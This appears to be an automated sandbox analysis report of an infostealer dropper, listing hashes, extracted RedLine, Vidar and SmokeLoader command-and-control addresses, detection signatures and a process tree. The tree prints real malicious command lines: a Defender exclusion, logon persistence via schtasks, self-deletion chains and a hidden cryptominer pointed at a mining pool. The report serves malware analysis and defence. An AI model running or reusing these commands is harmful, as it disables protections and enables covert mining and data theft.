Analysis

  • max time kernel
    29s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10-ja-20210920
  • submitted
    08-10-2021 18:24

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    71c3c6ef549daa7a9e2fe5cecb83031f

  • SHA1

    29b6c64e806bdc864ca37a62e50478c3179284a4

  • SHA256

    e6080d51c23ff3825d6dda3280757ba1ce88be4b06d10bf9960a0d79973b43e3

  • SHA512

    adb3c1350c732dc676356350edd8402b5e470836601f5252092ca369867dca48fb94e0038192a32363ee82402388c41a2eaac3558f1aaf8c15c3fc6944d6e09d

Malware Config

Extracted

Family

redline

Botnet

sehrish

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

media8

C2

91.121.67.60:2151

Extracted

Family

vidar

Version

41.2

Botnet

916

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    916

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 36 IoCs
  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 15 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3176
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4276
      • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2600
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri148ab4e7c687c2e61.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1520
          • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri148ab4e7c687c2e61.exe
            Fri148ab4e7c687c2e61.exe
            5⤵
            • Executes dropped EXE
            PID:2088
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im Fri148ab4e7c687c2e61.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri148ab4e7c687c2e61.exe" & del C:\ProgramData\*.dll & exit
              6⤵
                PID:1016
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im Fri148ab4e7c687c2e61.exe /f
                  7⤵
                  • Kills process with taskkill
                  PID:6640
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  7⤵
                  • Delays execution with timeout.exe
                  PID:7732
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri14fc548bbfdb093c.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1580
            • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14fc548bbfdb093c.exe
              Fri14fc548bbfdb093c.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2112
              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                6⤵
                  PID:1760
                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1028
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                      8⤵
                        PID:5960
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                          9⤵
                          • Creates scheduled task(s)
                          PID:5876
                      • C:\Users\Admin\AppData\Roaming\services64.exe
                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                        8⤵
                          PID:5448
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                            9⤵
                              PID:3572
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                10⤵
                                • Creates scheduled task(s)
                                PID:1608
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                              9⤵
                                PID:4404
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                9⤵
                                  PID:7176
                            • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                              "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:3844
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1ww01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe" & del C:\ProgramData\*.dll & exit
                                8⤵
                                  PID:5136
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im Soft1ww01.exe /f
                                    9⤵
                                    • Kills process with taskkill
                                    PID:6240
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    9⤵
                                    • Delays execution with timeout.exe
                                    PID:376
                              • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3196
                                • C:\Users\Admin\AppData\Roaming\6219442.scr
                                  "C:\Users\Admin\AppData\Roaming\6219442.scr" /S
                                  8⤵
                                    PID:2944
                                  • C:\Users\Admin\AppData\Roaming\2764723.scr
                                    "C:\Users\Admin\AppData\Roaming\2764723.scr" /S
                                    8⤵
                                      PID:1256
                                    • C:\Users\Admin\AppData\Roaming\7728715.scr
                                      "C:\Users\Admin\AppData\Roaming\7728715.scr" /S
                                      8⤵
                                        PID:5004
                                      • C:\Users\Admin\AppData\Roaming\3549938.scr
                                        "C:\Users\Admin\AppData\Roaming\3549938.scr" /S
                                        8⤵
                                          PID:3592
                                        • C:\Users\Admin\AppData\Roaming\5669905.scr
                                          "C:\Users\Admin\AppData\Roaming\5669905.scr" /S
                                          8⤵
                                            PID:3904
                                        • C:\Users\Admin\AppData\Local\Temp\inst001.exe
                                          "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
                                          7⤵
                                            PID:2120
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Fri148a7b41dd4e434.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1844
                                      • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri148a7b41dd4e434.exe
                                        Fri148a7b41dd4e434.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2180
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri148a7b41dd4e434.exe
                                          C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri148a7b41dd4e434.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1176
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Fri14a6f32b92b4d905.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1984
                                      • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14a6f32b92b4d905.exe
                                        Fri14a6f32b92b4d905.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3624
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          6⤵
                                            PID:4364
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              7⤵
                                              • Executes dropped EXE
                                              PID:1760
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              7⤵
                                              • Kills process with taskkill
                                              PID:2800
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Fri14e8398503.exe /mixone
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1804
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14e8398503.exe
                                          Fri14e8398503.exe /mixone
                                          5⤵
                                          • Executes dropped EXE
                                          PID:3908
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 656
                                            6⤵
                                            • Program crash
                                            PID:4992
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 672
                                            6⤵
                                            • Program crash
                                            PID:4704
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 676
                                            6⤵
                                            • Program crash
                                            PID:3488
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 672
                                            6⤵
                                            • Program crash
                                            PID:1716
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 880
                                            6⤵
                                            • Program crash
                                            PID:1368
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 956
                                            6⤵
                                            • Program crash
                                            PID:5336
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1192
                                            6⤵
                                            • Program crash
                                            PID:5876
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1264
                                            6⤵
                                            • Program crash
                                            PID:4976
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1304
                                            6⤵
                                            • Program crash
                                            PID:5176
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri14e8398503.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14e8398503.exe" & exit
                                            6⤵
                                              PID:6740
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "Fri14e8398503.exe" /f
                                                7⤵
                                                • Kills process with taskkill
                                                PID:1772
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Fri1484990fee93c2f8e.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2540
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1484990fee93c2f8e.exe
                                            Fri1484990fee93c2f8e.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3164
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1484990fee93c2f8e.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1484990fee93c2f8e.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4444
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Fri1465a48b4eaed.exe
                                          4⤵
                                            PID:2788
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1465a48b4eaed.exe
                                              Fri1465a48b4eaed.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4776
                                              • C:\Users\Admin\AppData\Roaming\2125919.scr
                                                "C:\Users\Admin\AppData\Roaming\2125919.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2208
                                              • C:\Users\Admin\AppData\Roaming\6252490.scr
                                                "C:\Users\Admin\AppData\Roaming\6252490.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:1852
                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:1836
                                              • C:\Users\Admin\AppData\Roaming\1437230.scr
                                                "C:\Users\Admin\AppData\Roaming\1437230.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1184
                                              • C:\Users\Admin\AppData\Roaming\5284869.scr
                                                "C:\Users\Admin\AppData\Roaming\5284869.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                PID:1860
                                              • C:\Users\Admin\AppData\Roaming\8957362.scr
                                                "C:\Users\Admin\AppData\Roaming\8957362.scr" /S
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5116
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri14869fa338025f0fc.exe
                                            4⤵
                                              PID:4020
                                              • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14869fa338025f0fc.exe
                                                Fri14869fa338025f0fc.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:956
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Fri1428082e2a9.exe
                                              4⤵
                                                PID:2528
                                                • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1428082e2a9.exe
                                                  Fri1428082e2a9.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:1192
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Fri14af1adda7.exe
                                                4⤵
                                                  PID:2512
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri14af1adda7.exe
                                                    Fri14af1adda7.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4896
                                                    • C:\Users\Admin\Pictures\Adobe Films\6SSdDTwvI6VR3R0p7DoKjX0A.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\6SSdDTwvI6VR3R0p7DoKjX0A.exe"
                                                      6⤵
                                                        PID:3488
                                                      • C:\Users\Admin\Pictures\Adobe Films\swfS_mtAUvY6ZW5Rjf2MqDso.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\swfS_mtAUvY6ZW5Rjf2MqDso.exe"
                                                        6⤵
                                                          PID:5652
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                            7⤵
                                                              PID:5400
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                8⤵
                                                                  PID:5268
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                7⤵
                                                                  PID:1812
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7fffe9784f50,0x7fffe9784f60,0x7fffe9784f70
                                                                    8⤵
                                                                      PID:5704
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:1
                                                                      8⤵
                                                                        PID:7188
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:1
                                                                        8⤵
                                                                          PID:7180
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2416 /prefetch:8
                                                                          8⤵
                                                                            PID:6324
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1812 /prefetch:8
                                                                            8⤵
                                                                              PID:3468
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1764 /prefetch:2
                                                                              8⤵
                                                                                PID:4208
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
                                                                                8⤵
                                                                                  PID:7524
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
                                                                                  8⤵
                                                                                    PID:7692
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 /prefetch:8
                                                                                    8⤵
                                                                                      PID:7968
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                      8⤵
                                                                                        PID:8124
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:8
                                                                                        8⤵
                                                                                          PID:5668
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:8
                                                                                          8⤵
                                                                                            PID:7780
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 /prefetch:8
                                                                                            8⤵
                                                                                              PID:6984
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 /prefetch:8
                                                                                              8⤵
                                                                                                PID:8096
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:7664
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2412 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:2676
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3336
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:6900
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:2856
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:1756
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5884 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:6780
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1752,454491919401856407,1398413149239843256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:6552
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
